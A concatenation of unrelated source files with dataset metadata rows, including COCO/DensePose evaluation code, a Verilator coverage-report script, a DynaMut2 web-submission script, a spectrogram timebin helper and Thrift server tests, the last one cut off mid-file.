                fps = np.logical_and(np.logical_not(dtm), np.logical_not(dtIg))
                # bug fix: np.float was removed in NumPy 1.24; use np.float64
                tp_sum = np.cumsum(tps, axis=1).astype(dtype=np.float64)
                fp_sum = np.cumsum(fps, axis=1).astype(dtype=np.float64)
                for t, (tp, fp) in enumerate(zip(tp_sum, fp_sum)):
                    tp = np.array(tp)
                    fp = np.array(fp)
                    nd = len(tp)
                    rc = tp / npig
                    pr = tp / (fp + tp + np.spacing(1))
                    q = np.zeros((R,))
                    if nd:
                        recall[t, k, a, m] = rc[-1]
                    else:
                        recall[t, k, a, m] = 0
                    # numpy is slow without cython optimization for accessing elements
                    # use python array gets significant speed improvement
                    pr = pr.tolist()
                    q = q.tolist()
                    # make the precision envelope monotonically non-increasing
                    for i in range(nd - 1, 0, -1):
                        if pr[i] > pr[i - 1]:
                            pr[i - 1] = pr[i]
                    inds = np.searchsorted(rc, p.recThrs, side="left")
                    try:
                        for ri, pi in enumerate(inds):
                            q[ri] = pr[pi]
                    except Exception:
                        # recall thresholds beyond rc[-1] keep their 0 default
                        pass
                    precision[t, :, k, a, m] = np.array(q)
    logger.info(
        "Final: max precision {}, min precision {}".format(np.max(precision), np.min(precision))
    )
    self.eval = {
        "params": p,
        "counts": [T, R, K, A, M],
        "date": datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        "precision": precision,
        "recall": recall,
    }
    toc = time.time()
    logger.info("DONE (t={:0.2f}s).".format(toc - tic))
def summarize(self):
    """
    Compute and display summary metrics for evaluation results.
    Note this function can *only* be applied on the default parameter setting
    """

    def _summarize(ap=1, iouThr=None, areaRng="all", maxDets=100):
        # log and return one scalar: mean AP (ap=1) or mean AR over the
        # selected slice of the accumulated precision/recall tensors
        p = self.params
        iStr = " {:<18} {} @[ {}={:<9} | area={:>6s} | maxDets={:>3d} ] = {:0.3f}"
        titleStr = "Average Precision" if ap == 1 else "Average Recall"
        typeStr = "(AP)" if ap == 1 else "(AR)"
        measure = "IoU"
        if self.params.iouType == "keypoints":
            measure = "OKS"
        elif self.params.iouType == "densepose":
            measure = "OGPS"
        iouStr = (
            "{:0.2f}:{:0.2f}".format(p.iouThrs[0], p.iouThrs[-1])
            if iouThr is None
            else "{:0.2f}".format(iouThr)
        )
        aind = [i for i, aRng in enumerate(p.areaRngLbl) if aRng == areaRng]
        mind = [i for i, mDet in enumerate(p.maxDets) if mDet == maxDets]
        if ap == 1:
            # dimension of precision: [TxRxKxAxM]
            s = self.eval["precision"]
            # IoU
            if iouThr is not None:
                t = np.where(np.abs(iouThr - p.iouThrs) < 0.001)[0]
                s = s[t]
            s = s[:, :, :, aind, mind]
        else:
            # dimension of recall: [TxKxAxM]
            s = self.eval["recall"]
            if iouThr is not None:
                t = np.where(np.abs(iouThr - p.iouThrs) < 0.001)[0]
                s = s[t]
            s = s[:, :, aind, mind]
        if len(s[s > -1]) == 0:
            mean_s = -1  # -1 marks slices with no valid entries
        else:
            mean_s = np.mean(s[s > -1])
        logger.info(iStr.format(titleStr, typeStr, measure, iouStr, areaRng, maxDets, mean_s))
        return mean_s

    def _summarizeDets():
        # standard 12-number COCO detection summary
        stats = np.zeros((12,))
        stats[0] = _summarize(1)
        stats[1] = _summarize(1, iouThr=0.5, maxDets=self.params.maxDets[2])
        stats[2] = _summarize(1, iouThr=0.75, maxDets=self.params.maxDets[2])
        stats[3] = _summarize(1, areaRng="small", maxDets=self.params.maxDets[2])
        stats[4] = _summarize(1, areaRng="medium", maxDets=self.params.maxDets[2])
        stats[5] = _summarize(1, areaRng="large", maxDets=self.params.maxDets[2])
        stats[6] = _summarize(0, maxDets=self.params.maxDets[0])
        stats[7] = _summarize(0, maxDets=self.params.maxDets[1])
        stats[8] = _summarize(0, maxDets=self.params.maxDets[2])
        stats[9] = _summarize(0, areaRng="small", maxDets=self.params.maxDets[2])
        stats[10] = _summarize(0, areaRng="medium", maxDets=self.params.maxDets[2])
        stats[11] = _summarize(0, areaRng="large", maxDets=self.params.maxDets[2])
        return stats

    def _summarizeKps():
        # standard 10-number COCO keypoint summary
        stats = np.zeros((10,))
        stats[0] = _summarize(1, maxDets=20)
        stats[1] = _summarize(1, maxDets=20, iouThr=0.5)
        stats[2] = _summarize(1, maxDets=20, iouThr=0.75)
        stats[3] = _summarize(1, maxDets=20, areaRng="medium")
        stats[4] = _summarize(1, maxDets=20, areaRng="large")
        stats[5] = _summarize(0, maxDets=20)
        stats[6] = _summarize(0, maxDets=20, iouThr=0.5)
        stats[7] = _summarize(0, maxDets=20, iouThr=0.75)
        stats[8] = _summarize(0, maxDets=20, areaRng="medium")
        stats[9] = _summarize(0, maxDets=20, areaRng="large")
        return stats

    def _summarizeUvs():
        # DensePose summary; the low-threshold entries are only included
        # when the configured threshold range actually covers them
        stats = [_summarize(1, maxDets=self.params.maxDets[0])]
        min_threshold = self.params.iouThrs.min()
        if min_threshold <= 0.201:
            stats += [_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.2)]
        if min_threshold <= 0.301:
            stats += [_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.3)]
        if min_threshold <= 0.401:
            stats += [_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.4)]
        stats += [
            _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.5),
            _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.75),
            _summarize(1, maxDets=self.params.maxDets[0], areaRng="medium"),
            _summarize(1, maxDets=self.params.maxDets[0], areaRng="large"),
            _summarize(0, maxDets=self.params.maxDets[0]),
            _summarize(0, maxDets=self.params.maxDets[0], iouThr=0.5),
            _summarize(0, maxDets=self.params.maxDets[0], iouThr=0.75),
            _summarize(0, maxDets=self.params.maxDets[0], areaRng="medium"),
            _summarize(0, maxDets=self.params.maxDets[0], areaRng="large"),
        ]
        return np.array(stats)

    def _summarizeUvsOld():
        # legacy 18-number DensePose summary; not referenced by the dispatch
        # below, kept for reference
        stats = np.zeros((18,))
        stats[0] = _summarize(1, maxDets=self.params.maxDets[0])
        stats[1] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.5)
        stats[2] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.55)
        stats[3] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.60)
        stats[4] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.65)
        stats[5] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.70)
        stats[6] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.75)
        stats[7] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.80)
        stats[8] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.85)
        stats[9] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.90)
        stats[10] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.95)
        stats[11] = _summarize(1, maxDets=self.params.maxDets[0], areaRng="medium")
        stats[12] = _summarize(1, maxDets=self.params.maxDets[0], areaRng="large")
        stats[13] = _summarize(0, maxDets=self.params.maxDets[0])
        stats[14] = _summarize(0, maxDets=self.params.maxDets[0], iouThr=0.5)
        stats[15] = _summarize(0, maxDets=self.params.maxDets[0], iouThr=0.75)
        stats[16] = _summarize(0, maxDets=self.params.maxDets[0], areaRng="medium")
        stats[17] = _summarize(0, maxDets=self.params.maxDets[0], areaRng="large")
        return stats

    if not self.eval:
        raise Exception("Please run accumulate() first")
    iouType = self.params.iouType
    if iouType in ["segm", "bbox"]:
        summarize = _summarizeDets
    elif iouType in ["keypoints"]:
        summarize = _summarizeKps
    elif iouType in ["densepose"]:
        summarize = _summarizeUvs
    # NOTE(review): no else branch -- an unexpected iouType would raise
    # NameError on the next line; Params.__init__ validation is assumed
    self.stats = summarize()
def __str__(self):
    """Log the summary metrics and return a printable representation.

    Bug fix: the previous implementation returned None (the implicit
    return of summarize()), so str(obj) / print(obj) raised
    "TypeError: __str__ returned non-string". The metrics are emitted via
    the logger inside summarize(), so an empty string is returned here.
    """
    self.summarize()
    return ""
# ================ functions for dense pose ==============================
def findAllClosestVertsUV(self, U_points, V_points, Index_points):
    """Map predicted (I, U, V) values to mesh vertex ids.

    For each of the 24 body parts, every point assigned to that part is
    matched to its nearest precomputed UV sample (self.Part_UVs) and takes
    the corresponding vertex index from self.Part_ClosestVertInds; points
    with no part label keep -1.
    :return: vertex indices remapped through self.PDIST_transform,
        with 0 for unassigned points
    """
    ClosestVerts = np.ones(Index_points.shape) * -1
    for i in np.arange(24):
        if (i + 1) in Index_points:
            # UV coordinates of all points predicted to lie on part i+1
            UVs = np.array(
                [U_points[Index_points == (i + 1)], V_points[Index_points == (i + 1)]]
            )
            Current_Part_UVs = self.Part_UVs[i]
            Current_Part_ClosestVertInds = self.Part_ClosestVertInds[i]
            # nearest precomputed UV sample per point (euclidean in UV space)
            D = ssd.cdist(Current_Part_UVs.transpose(), UVs.transpose()).squeeze()
            ClosestVerts[Index_points == (i + 1)] = Current_Part_ClosestVertInds[
                np.argmin(D, axis=0)
            ]
    ClosestVertsTransformed = self.PDIST_transform[ClosestVerts.astype(int) - 1]
    ClosestVertsTransformed[ClosestVerts < 0] = 0
    return ClosestVertsTransformed
def findAllClosestVertsCSE(self, cse_indices, mask):
    """Select CSE vertex predictions where the mask is foreground.

    Positions with mask == 1 take their predicted vertex index; all other
    positions are marked unassigned with -1.
    """
    vertex_ids = np.full(cse_indices.shape, -1.0)
    fg = mask == 1
    vertex_ids[fg] = cse_indices[fg]
    return vertex_ids
def findAllClosestVertsGT(self, gt):
    """Map ground-truth (I, U, V) annotations to mesh vertex ids.

    Same nearest-UV lookup as findAllClosestVertsUV, applied to the
    annotated dp_I/dp_U/dp_V arrays of one ground-truth instance.
    :return: tuple (raw vertex indices with -1 for unassigned points,
        indices remapped through self.PDIST_transform with 0 for unassigned)
    """
    I_gt = np.array(gt["dp_I"])
    U_gt = np.array(gt["dp_U"])
    V_gt = np.array(gt["dp_V"])
    ClosestVertsGT = np.ones(I_gt.shape) * -1
    for i in np.arange(24):
        if (i + 1) in I_gt:
            # annotated UV coordinates of all GT points on part i+1
            UVs = np.array([U_gt[I_gt == (i + 1)], V_gt[I_gt == (i + 1)]])
            Current_Part_UVs = self.Part_UVs[i]
            Current_Part_ClosestVertInds = self.Part_ClosestVertInds[i]
            # nearest precomputed UV sample per point (euclidean in UV space)
            D = ssd.cdist(Current_Part_UVs.transpose(), UVs.transpose()).squeeze()
            ClosestVertsGT[I_gt == (i + 1)] = Current_Part_ClosestVertInds[np.argmin(D, axis=0)]
    ClosestVertsGTTransformed = self.PDIST_transform[ClosestVertsGT.astype(int) - 1]
    ClosestVertsGTTransformed[ClosestVertsGT < 0] = 0
    return ClosestVertsGT, ClosestVertsGTTransformed
def getDistancesCSE(self, cVertsGT, cVerts, mesh_name):
    """Geodesic distances between matched GT / predicted mesh vertices.

    Pairs where either side is unassigned (< 0) keep an infinite distance.
    """
    distances = np.full(len(cVertsGT), np.inf)
    valid = np.logical_and(cVertsGT >= 0, cVerts >= 0)
    mesh = create_mesh(mesh_name, "cpu")
    distances[valid] = mesh.geodists[cVertsGT[valid], cVerts[valid]]
    return distances
def getDistancesUV(self, cVertsGT, cVerts):
    """Look up geodesic distances between GT and predicted vertex ids.

    self.Pdist_matrix stores the upper triangle of the n x n vertex
    geodesic-distance matrix in condensed (pdist-style) form; the index
    arithmetic below converts a vertex pair (i, j) into its position in
    that flat array. Unmatched predictions (cVerts[d] <= 0) contribute an
    infinite distance; GT points without a vertex (cVertsGT[d] <= 0) are
    skipped entirely, so the output may be shorter than the input.
    """
    n = 27554  # number of vertices in the subsampled mesh
    dists = []
    for d in range(len(cVertsGT)):
        if cVertsGT[d] > 0:
            if cVerts[d] > 0:
                # stored ids are 1-based; convert to 0-based
                i = cVertsGT[d] - 1
                j = cVerts[d] - 1
                if j == i:
                    dists.append(0)
                elif j > i:
                    # swap so that i > j before computing the condensed index
                    ccc = i
                    i = j
                    j = ccc
                    i = n - i - 1
                    j = n - j - 1
                    k = (n * (n - 1) / 2) - (n - i) * ((n - i) - 1) / 2 + j - i - 1
                    k = (n * n - n) / 2 - k - 1
                    dists.append(self.Pdist_matrix[int(k)][0])
                else:
                    i = n - i - 1
                    j = n - j - 1
                    k = (n * (n - 1) / 2) - (n - i) * ((n - i) - 1) / 2 + j - i - 1
                    k = (n * n - n) / 2 - k - 1
                    dists.append(self.Pdist_matrix[int(k)][0])
            else:
                dists.append(np.inf)
    return np.atleast_1d(np.array(dists).squeeze())
class Params:
    """
    Params for coco evaluation api
    """

    def setDetParams(self):
        """Defaults for bbox/segm evaluation (standard COCO detection protocol)."""
        self.imgIds = []
        self.catIds = []
        # np.arange causes trouble. the data point on arange is slightly larger than the true value
        self.iouThrs = np.linspace(0.5, 0.95, int(np.round((0.95 - 0.5) / 0.05)) + 1, endpoint=True)
        self.recThrs = np.linspace(0.0, 1.00, int(np.round((1.00 - 0.0) / 0.01)) + 1, endpoint=True)
        self.maxDets = [1, 10, 100]
        self.areaRng = [
            [0 ** 2, 1e5 ** 2],
            [0 ** 2, 32 ** 2],
            [32 ** 2, 96 ** 2],
            [96 ** 2, 1e5 ** 2],
        ]
        self.areaRngLbl = ["all", "small", "medium", "large"]
        self.useCats = 1

    def setKpParams(self):
        """Defaults for keypoint (OKS) evaluation."""
        self.imgIds = []
        self.catIds = []
        # np.arange causes trouble. the data point on arange is slightly larger than the true value
        # bug fix: np.linspace requires an integer `num`; the other two setters
        # wrap the rounded count in int(), this one passed np.round's float
        # result directly, which raises TypeError on modern NumPy
        self.iouThrs = np.linspace(0.5, 0.95, int(np.round((0.95 - 0.5) / 0.05)) + 1, endpoint=True)
        self.recThrs = np.linspace(0.0, 1.00, int(np.round((1.00 - 0.0) / 0.01)) + 1, endpoint=True)
        self.maxDets = [20]
        self.areaRng = [[0 ** 2, 1e5 ** 2], [32 ** 2, 96 ** 2], [96 ** 2, 1e5 ** 2]]
        self.areaRngLbl = ["all", "medium", "large"]
        self.useCats = 1

    def setUvParams(self):
        """Defaults for DensePose (GPS/GPSM) evaluation."""
        self.imgIds = []
        self.catIds = []
        self.iouThrs = np.linspace(0.5, 0.95, int(np.round((0.95 - 0.5) / 0.05)) + 1, endpoint=True)
        self.recThrs = np.linspace(0.0, 1.00, int(np.round((1.00 - 0.0) / 0.01)) + 1, endpoint=True)
        self.maxDets = [20]
        self.areaRng = [[0 ** 2, 1e5 ** 2], [32 ** 2, 96 ** 2], [96 ** 2, 1e5 ** 2]]
        self.areaRngLbl = ["all", "medium", "large"]
        self.useCats = 1

    def __init__(self, iouType="segm"):
        """Initialize defaults for the given evaluation type.

        :param iouType: one of "segm", "bbox", "keypoints", "densepose"
        :raises Exception: for any other value
        """
        if iouType == "segm" or iouType == "bbox":
            self.setDetParams()
        elif iouType == "keypoints":
            self.setKpParams()
        elif iouType == "densepose":
            self.setUvParams()
        else:
            raise Exception("iouType not supported")
        self.iouType = iouType
        # useSegm is deprecated
        self.useSegm = None
| 43.94398 | 110 | 0.512206 |
79545221add94b78078f5e419af1cd5aa3a5676d | 1,501 | py | Python | gen_coverage_report.py | umarcor/uhdm-integration | 5f3e5092cc912bed131b4b6328eef5537fec30e7 | [
"Apache-2.0"
] | 19 | 2020-07-27T08:07:13.000Z | 2021-06-22T20:10:04.000Z | gen_coverage_report.py | umarcor/uhdm-integration | 5f3e5092cc912bed131b4b6328eef5537fec30e7 | [
"Apache-2.0"
] | 214 | 2021-06-23T09:30:10.000Z | 2022-02-23T15:15:48.000Z | gen_coverage_report.py | umarcor/uhdm-integration | 5f3e5092cc912bed131b4b6328eef5537fec30e7 | [
"Apache-2.0"
] | 4 | 2020-04-21T17:06:23.000Z | 2020-11-04T09:03:49.000Z | import argparse
# Command-line script: compares the set of node types present in a UHDM dump
# against the set of nodes visited by the Verilator frontend and writes a
# plain-text coverage report.
parser = argparse.ArgumentParser(description="Generate HTML coverage report "
                                 "for UHDM-Verilator frontend")
parser.add_argument('--verilator-uhdm', action='store', dest='verilator_report')
parser.add_argument('--output-file', action='store', dest='output_file')
args = parser.parse_args()

present_in_uhdm = set()
visited_by_frontend = set()

# The report interleaves two sections; the "UHDM contents:" / "Visited nodes:"
# header lines switch which set the following lines are collected into.
# Lines are stored with their trailing newline so they can be joined verbatim.
with open(args.verilator_report, 'r') as f:
    target = present_in_uhdm
    for line in f:
        if line == "UHDM contents:\n":
            target = present_in_uhdm
        elif line == "Visited nodes:\n":
            target = visited_by_frontend
        else:
            target.add(line)

with open(args.output_file, 'w') as outfile:
    not_visited = present_in_uhdm - visited_by_frontend
    arranged = sorted(not_visited)
    outfile.write(''.join(arranged))
    outfile.write("Present in UHDM: " + str(len(present_in_uhdm)) + '\n')
    outfile.write("Visited: " + str(len(visited_by_frontend)) + '\n')
    # bug fix: guard against ZeroDivisionError when the report lists no nodes
    if present_in_uhdm:
        coverage = len(visited_by_frontend) / len(present_in_uhdm) * 100
    else:
        coverage = 0.0
    outfile.write("Overall coverage: " + str(coverage) + "%\n")
    outfile.write("\nMissing node count per type:\n")
    types = set()
    missed_nodes = dict()
    for node in not_visited:
        # node lines look like "...:<type>\n"; strip the trailing newline
        node_type = node.split(':')[-1][:-1]
        types.add(node_type)
        missed_nodes[node_type] = missed_nodes.get(node_type, 0) + 1
    for t in types:
        outfile.write(" Type: " + str(t) + "\tCount: " + str(missed_nodes[t]) + '\n')
| 37.525 | 104 | 0.637575 |
7954529fc932041b1ad2e0f333e4bc6dec248b5a | 3,016 | py | Python | auto_dynamut2.py | automutation/Mutation-prediction-automation | a6a34925c6962d91d2dd92e3a59b09f09d2e3b05 | [
"AFL-1.1"
] | null | null | null | auto_dynamut2.py | automutation/Mutation-prediction-automation | a6a34925c6962d91d2dd92e3a59b09f09d2e3b05 | [
"AFL-1.1"
] | null | null | null | auto_dynamut2.py | automutation/Mutation-prediction-automation | a6a34925c6962d91d2dd92e3a59b09f09d2e3b05 | [
"AFL-1.1"
] | null | null | null | #!usr/bin/python3
import re
import mechanicalsoup as msp
import sys
import pandas as pd
import os
def runDynamut(pdbFile,mutationFile,fChain):
    """Submit each mutation in mutationFile to the DynaMut2 web server and
    record the predicted stability changes in outFiles/dynamut2.out.

    Mutations whose residue is missing from the structure (REMARK 465
    records for the target chain) or precedes the first resolved ATOM
    residue are filtered out before submission.
    NOTE(review): any failure anywhere in the body is swallowed by the
    bare except at the bottom and only printed to stdout.
    """
    os.chdir("/home/ibab/automutation")
    try:
        chain = fChain
        # mutation file: one mutation per line, e.g. "A123G"
        file1 = open(mutationFile,"r")
        muts = file1.readlines()
        file1.close()
        muts = [x.strip() for x in muts]
        newRes = [x[-1] for x in muts]   # substituted residue (last char)
        oldRes = [x[0] for x in muts]    # original residue (first char)
        pos = []
        for x in muts:
            # residue number is the digits between the two residue letters
            position = ''.join(re.findall('\d',x))
            pos.append(int(position))
        pdbfile=open(pdbFile,"r")
        pdblines=pdbfile.readlines()
        # first resolved residue number: column 6 of the first ATOM record
        for lines in pdblines:
            if re.match("^ATOM",lines):
                firstRes=re.split('\s+',lines)[5]
                break
        # REMARK 465 records list residues missing from the structure
        missing = []
        for lines in pdblines:
            if re.match("REMARK 465",lines):
                missing.append(lines)
        chainA=[]
        # NOTE(review): missing[7:] assumes the REMARK 465 header occupies
        # the first 7 collected lines -- confirm against the PDB format
        for x in missing[7:]:
            if re.split('\s+',x)[3]==chain:
                chainA.append(int(re.split('\s+',x)[4]))
        common=[x for x in pos if x in chainA]
        # Removing missing residues from mutation file
        notCommon=[]
        for x in pos:
            if x in common or x < int(firstRes):
                notCommon.append(0)  # 0 marks a position to drop
            else:
                notCommon.append(x)
        muts=[]
        for i in range(len(pos)):
            if notCommon[i]==0:
                pass
            else:
                muts.append(oldRes[i]+str(notCommon[i])+newRes[i])
        # start the CSV output with its header, then reopen in append mode
        outFile=open("outFiles/dynamut2.out","w")
        outFile.write("Mutation,Stability,ddG\n")
        outFile.close()
        url1 = "http://biosig.unimelb.edu.au/dynamut2/submit_prediction"
        logFile=open("logFiles/dynamut2.log","w")
        outFile=open("outFiles/dynamut2.out","a")
        for i in range(len(muts)):
            # Submission of mutations to the web server
            br = msp.StatefulBrowser()
            br.open(url1)
            form = br.select_form(nr=0)
            form.set("pdb_file_single",pdbFile)
            br["mutation_single"]=muts[i]
            br["chain_single"] = chain
            br.submit_selected()
            if "Error" in br.page.text:
                print("DynaMut2: Error in submission of a mutation. Check log file for details.")
                logFile.write(br.page.text.split("Submission Error")[2].split("arrow")[0])
            else:
                # Fetching results from the webpage: poll the result URL
                # until the prediction appears on the page
                res = br.get_url()
                while("Predicted Stability Change" not in br.page.text):
                    br.open(res)
                result=re.split("Predicted Stability Change",br.page.text)[1].split('\n\n')[0]
                score=result.split('\n')[1].split()[0]
                stability=result.split('\n')[2][1:-1]
                outFile.write(muts[i]+","+stability+","+score+"\n")
        logFile.close()
        outFile.close()
        # dead code below kept as-is (disabled pandas post-processing)
        """pos = []
for x in df.mutation:
position = ''.join(re.findall('\d',x))
pos.append(int(position))
df["pos"] = pos
df = df.sort_values(by=["pos"])
df = read_csv("outFiles/dynamut2.out",header=True,index_col=False)
stab = []
for x in df.score:
if x < 0:
stab.append("Destabilizing")
else:
stab.append("Stabilizing")
df["stability"] = stab
df = df.filter(["mutation","stability","prediction"],axis=1)
df.columns = ["Mutation","Prediction","Stability"]
df.to_csv("outFiles/dynaRes.out",index=False)
os.system("rm submit.txt")"""
    except:
        print(str(sys.exc_info()[0])+" occured and DynaMut2 could not run")
| 29.281553 | 85 | 0.651857 |
79545308c1ae02f449457df0d1ce175543a64c0e | 1,265 | py | Python | src/vak/timebins.py | yardencsGitHub/vak | 04da97b02ded5acccab437c2538d0a1ded3bef80 | [
"BSD-3-Clause"
] | 1 | 2021-04-27T01:22:38.000Z | 2021-04-27T01:22:38.000Z | src/vak/timebins.py | yardencsGitHub/vak | 04da97b02ded5acccab437c2538d0a1ded3bef80 | [
"BSD-3-Clause"
] | null | null | null | src/vak/timebins.py | yardencsGitHub/vak | 04da97b02ded5acccab437c2538d0a1ded3bef80 | [
"BSD-3-Clause"
] | null | null | null | """module for functions that deal with vector of times from a spectrogram,
i.e. where elements are the times at bin centers"""
import numpy as np
def timebin_dur_from_vec(time_bins, n_decimals_trunc=5):
    """Estimate the duration of one time bin from a vector of bin centers.

    Parameters
    ----------
    time_bins : numpy.ndarray
        Vector of times in a spectrogram, where each value is a bin center.
    n_decimals_trunc : int
        Number of decimal places kept when truncating the estimated
        duration. Default is 5.

    Returns
    -------
    timebin_dur : float
        Estimated duration of a single time bin.

    Notes
    -----
    Averages the pairwise differences between neighboring bin centers to
    smooth out floating-point error, rounds to ``n_decimals_trunc`` decimal
    places, then truncates anything beyond that place.
    """
    # Mean step between neighboring bin centers.
    mean_step = np.mean(np.diff(time_bins))
    # Round first, then chop off everything past the requested decimal.
    rounded = np.around(mean_step, decimals=n_decimals_trunc)
    scale = 10 ** n_decimals_trunc
    return np.trunc(rounded * scale) / scale
| 34.189189 | 93 | 0.699605 |
7954532a5ef8fd1c8821aa027f9f95090399c26a | 1,547 | py | Python | test/test_er.py | chrisgarcia001/Crisis-Volunteer-Resource-Allocation | d181327d9f077aa40f817ec066bfc2324d1bf01b | [
"MIT"
] | null | null | null | test/test_er.py | chrisgarcia001/Crisis-Volunteer-Resource-Allocation | d181327d9f077aa40f817ec066bfc2324d1bf01b | [
"MIT"
] | null | null | null | test/test_er.py | chrisgarcia001/Crisis-Volunteer-Resource-Allocation | d181327d9f077aa40f817ec066bfc2324d1bf01b | [
"MIT"
] | null | null | null | from os import sys
sys.path.insert(0, '../src/')
from experiment_runner import *
param_path = './params/base.csv'
def mpp(matrix):
    """Matrix pretty-print: write each row of *matrix* on its own line."""
    for entry in matrix:
        print(entry)
# Reference example of a hand-written parameter dict:
#params = {'tasks per shift':3, 'shifts per day':2, 'days in horizon':3, 'min shifts off between tasks':1}

# Load generator parameters from the CSV file.
# NOTE(review): second argument's meaning is defined in experiment_runner —
# presumably a "parse/verbose" flag; confirm there.
params = read_params(param_path, True)
dg = DataGenerator(params)

# print('Random test')
# for i in range(10):
# print(random_float(5, 10))

# Dump each generated structure for visual inspection via mpp().
print('Dummy Tasks')
mpp(dg.get_dummy_task_indices())

print('Tasks by Shift')
mpp(dg.get_tasks_by_shift())

print('Task Shift Map')
mpp(dg.task_shift_map())

print('Task Conflict Matrix')
mpp(dg.build_task_conflict_matrix())

print('E Matrix')
mpp(dg.build_E_matrix())

print('Transportation Cost Matrix')
mpp(dg.build_transp_cost_matrix())

# Remaining dumps kept commented out (exercise further DataGenerator outputs).
# print('\nShortage Cost Matrix')
# mpp(dg.build_shortage_weight_matrix())
# print('\nResource-Type Matrix')
# mpp(dg.build_resource_type_matrix())
# print('\nAvailability Matrix')
# mpp(dg.build_availability_matrix())
# print('\nDependency Ratio Matrix')
# mpp(dg.build_dependency_matrix())
# print('\nInitial Demand Matrix')
# init_demand = dg.build_initial_demand_matrix()
# mpp(init_demand)
# print('\nUpdated Demand Matrix')
# mpp(dg.build_updated_demand_matrix(init_demand))
# print('\nInitial Problem')
# init_data = dg.build_initial_data()
# print(init_data['text'])
# print('\nUpdated Problem')
# print(dg.build_updated_data(init_data, init_data['y'])['text'])

#--- Test ProblemExecutor.
ex = ProblemExecutor(param_path)
#ex.solve_instance(1)
ex.solve_problem_set()
795454e09b3fe8f1381cfa7b205ca865fb0f9cfc | 7,836 | py | Python | thrift/lib/py/util/TCppServerTestManagerTest.py | CacheboxInc/fbthrift | b894dd9192ea4684c0067c93bb2ba2b9547749ec | [
"Apache-2.0"
] | 1 | 2018-02-28T06:45:51.000Z | 2018-02-28T06:45:51.000Z | thrift/lib/py/util/TCppServerTestManagerTest.py | CacheboxInc/fbthrift | b894dd9192ea4684c0067c93bb2ba2b9547749ec | [
"Apache-2.0"
] | null | null | null | thrift/lib/py/util/TCppServerTestManagerTest.py | CacheboxInc/fbthrift | b894dd9192ea4684c0067c93bb2ba2b9547749ec | [
"Apache-2.0"
] | 1 | 2018-02-28T06:45:18.000Z | 2018-02-28T06:45:18.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import threading
import unittest
from thrift.Thrift import TApplicationException, TPriority
from thrift.protocol import THeaderProtocol
from thrift.transport import TSocket
from thrift.transport import THeaderTransport
from thrift.transport.TTransport import TTransportException
from thrift.util.TCppServerTestManager import TCppServerTestManager
from thrift.util.test_service import (
TestService,
PriorityService,
SubPriorityService
)
from thrift.util.test_service.ttypes import UserException2
class BaseTest(unittest.TestCase):
    """Shared helpers for issuing header-protocol RPCs at a test server."""

    def _perform_rpc(self, server, service, method, *args, **kwargs):
        # Delegate with the default 5-second timeout.
        return self._expiring_rpc(
            server, service, method, 5 * 1000, *args, **kwargs)

    # Same as _perform_rpc, but with an explicit timeout (milliseconds).
    def _expiring_rpc(self, server, service, method, tm, *args, **kwargs):
        host, port = server.addr()
        # A fresh socket per call keeps each RPC independent; the context
        # manager closes it even when the call raises.
        with TSocket.TSocket(host=host, port=port) as sock:
            sock.setTimeout(tm)
            proto = THeaderProtocol.THeaderProtocol(
                THeaderTransport.THeaderTransport(sock))
            client = service.Client(proto, proto)
            rpc = getattr(client, method)
            return rpc(*args, **kwargs)
class TestTCppServerTestManager(BaseTest):
    """Smoke tests for the ways a TCppServerTestManager can be constructed."""

    class Handler(TestService.Iface):
        # Minimal TestService implementation backed by an in-memory dict.
        def __init__(self, data):
            self.__data = data

        def getDataById(self, id):
            return self.__data[id]

        def throwUserException(self):
            # Exception the client catches directly (see header test below).
            raise UserException2("Some message")

        def throwUncaughtException(self, msg):
            # Undeclared exception: reaches the client as TApplicationException.
            raise AssertionError(msg)

    def _perform_getDataById(self, server, val):
        return self._perform_rpc(server, TestService, 'getDataById', val)

    def test_with_handler(self):
        # Manager accepts a bare handler instance.
        handler = self.Handler({7: "hello"})
        with TCppServerTestManager(handler) as server:
            data = self._perform_getDataById(server, 7)
            self.assertEquals(data, "hello")

    def test_with_processor(self):
        # Manager accepts a Processor wrapping the handler.
        handler = self.Handler({7: "hello"})
        processor = TestService.Processor(handler)
        with TCppServerTestManager(processor) as server:
            data = self._perform_getDataById(server, 7)
            self.assertEquals(data, "hello")

    def test_with_server(self):
        # Manager accepts a fully-built server object.
        handler = self.Handler({7: "hello"})
        processor = TestService.Processor(handler)
        server = TCppServerTestManager.make_server(processor)
        with TCppServerTestManager(server) as server:
            data = self._perform_getDataById(server, 7)
            self.assertEquals(data, "hello")

    def test_throw_populates_headers(self):
        # Server-side exceptions should be reflected in the response headers:
        # 'uex' carries the exception type, 'uexw' the message text.
        handler = self.Handler({7: "hello"})
        processor = TestService.Processor(handler)
        server = TCppServerTestManager.make_server(processor)
        with TCppServerTestManager(server) as server:
            host, port = server.addr()
            with TSocket.TSocket(host=host, port=port) as sock:
                transport = THeaderTransport.THeaderTransport(sock)
                protocol = THeaderProtocol.THeaderProtocol(transport)
                client = TestService.Client(protocol, protocol)

                try:
                    client.throwUserException()
                    self.fail('Expect to throw UserException2')
                except UserException2:
                    pass

                self.assertEquals("UserException2", transport.get_headers()["uex"])
                self.assertIn("Some message", transport.get_headers()["uexw"])

                try:
                    client.throwUncaughtException("a message!")
                    self.fail('Expect to throw TApplicationException')
                except TApplicationException:
                    pass

                self.assertEquals(
                    "TApplicationException", transport.get_headers()["uex"])
                self.assertIn(
                    "a message!", transport.get_headers()["uexw"])
class TestTCppServerPriorities(BaseTest):
    """Checks that thrift priority annotations map to the expected queues."""

    class PriorityHandler(PriorityService.Iface):
        # Class-level events available to tests that need to block a handler
        # (not used by every test in this class).
        event = threading.Event()
        stuck = threading.Event()

        def bestEffort(self):
            return True

        def normal(self):
            return True
